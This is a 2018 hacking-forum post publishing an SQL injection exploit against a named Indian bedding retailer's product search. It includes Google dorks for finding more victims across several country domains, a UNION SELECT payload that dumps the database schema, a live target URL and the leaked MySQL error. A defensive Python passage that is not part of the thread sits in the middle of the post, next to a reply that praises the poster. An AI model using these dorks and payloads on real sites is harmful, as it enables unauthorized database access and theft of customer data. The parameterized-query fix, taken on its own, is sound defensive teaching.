Topic: SleePediain SleepwellFoundation India SQL Inj Vuln
KingSkrupellos
Comment: #1
SleePediain SleepwellFoundation India SQL Inj Vuln
21.06.2018 19:36
#################################################################################################

# Exploit Title : SleePedia.in an initiative of SleepwellFoundation India Nepal Bhutan SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Vendor Homepage : sleepedia.in ~ sleepwellfoundation.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks :

inurl:''/products/searchByKeyword/?keyword_search=''

inurl:''/cms/store_locator''

inurl:''/products/product_detail/''

# Note : Search in these domain extensions => site:np site:in site:bt site:com site:net site:org

# Exploit : /products/searchByKeyword/?keyword_search=.1'

+ Data =>

LOCALHOST/products/searchByKeyword/?keyword_search=.1%27%20union%20select%201,2,3,4,group_concat(table_name,column_name),6,7,8,9,10,11,12,13%20from%20information_schema.columns%20where%20table_schema=database()--+-

+ Dump in one shot =>


#################################################################################################

# Example Site : sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1%27 => [ Proof of Concept for SQL Inj ] => archive.is/8wz2E

# SQL Database Error :

A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '%' or V.product_Specification like '%.1'%' group by V.pid' at line 10
SELECT V.`id`, V.`cid`, V.`scid`,V.`pid`, V.`product_name`, V.`length`, V.`thickness`, V.`breadth`, V.`price`, V.`status`,
V.`state`,P.slug, P.detail_image FROM `sw_product_variant` V, sw_product P WHERE V.pid = P.id AND V.`status` = '1'
AND P.status='1' AND V.price!='0' AND V.list_show='1' AND V.state='' and V.product_name like '%.1'%' or
V.product_Specification like '%.1'%' group by V.pid
Filename: models/Product_model.php
Line Number: 1152

+ Proof of Concept : archive.is/h20Ww - archive.is/hKhSa

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

We don't care what people think about us; we are proud of ourselves and we are not gonna change for anyone. I do not own a website. No contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
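The error message in the post leaks the query shape: the keyword is concatenated straight into two `LIKE '%...%'` patterns, which is why a single `.1'` probe produces MySQL error 1064. As an added example (not the forum post's or the vendor's code), this Python/SQLite model rebuilds that concatenation against a constructed `sw_product_variant` table and puts the parameterized, wildcard-escaped form beside it; the table and column names follow the error message, the rows are made up.

```python
import sqlite3

# Constructed stand-in for the sw_product_variant table named in the error
# message; only the two columns the LIKE clauses touch are modelled.
SAMPLE_ROWS = [
    (1, "Sleepwell Pillow", "Memory foam, 24 x 16 in"),
    (2, "Ortho Mattress", "Firm, 78 x 72 x 6 in"),
    (3, "Size 100% Cotton Sheet", "Rated .1' seam"),
]

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sw_product_variant "
                 "(id INTEGER, product_name TEXT, product_Specification TEXT)")
    conn.executemany("INSERT INTO sw_product_variant VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn

def search_unsafe(conn, keyword):
    # The pattern the leaked query reveals: the keyword is spliced straight
    # into both LIKE patterns, so a quote in the input rewrites the statement.
    sql = ("SELECT id, product_name FROM sw_product_variant "
           "WHERE product_name LIKE '%" + keyword + "%' "
           "OR product_Specification LIKE '%" + keyword + "%'")
    return conn.execute(sql).fetchall()

def escape_like(value, esc="!"):
    # Neutralise LIKE metacharacters so the user's % and _ match literally.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%").replace("_", esc + "_"))

def search_safe(conn, keyword):
    # Bound parameter: the keyword is data, never SQL text. ESCAPE '!' is
    # accepted by both SQLite and MySQL, so the fix ports to the real backend.
    pattern = "%" + escape_like(keyword) + "%"
    sql = ("SELECT id, product_name FROM sw_product_variant "
           "WHERE product_name LIKE ? ESCAPE '!' "
           "OR product_Specification LIKE ? ESCAPE '!'")
    return conn.execute(sql, (pattern, pattern)).fetchall()

def compare(keyword):
    """Run both forms on one keyword and report how each behaved."""
    conn = build_db()
    try:
        unsafe_rows, unsafe_error = search_unsafe(conn, keyword), None
    except sqlite3.OperationalError as exc:  # SQLite's analogue of MySQL error 1064
        unsafe_rows, unsafe_error = None, str(exc)
    return {"unsafe_rows": unsafe_rows, "unsafe_error": unsafe_error,
            "safe_rows": search_safe(conn, keyword)}
```

`compare(".1'")` reproduces the syntax error on the concatenated form while the bound form simply searches for the literal text; `compare("%")` shows the second defect the escaping fixes, a bare wildcard matching every row.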
Leader Shawai
Comment: #2
RE: SleePediain SleepwellFoundation India SQL Inj Vuln
21.06.2018 20:43
Thank you, well done :)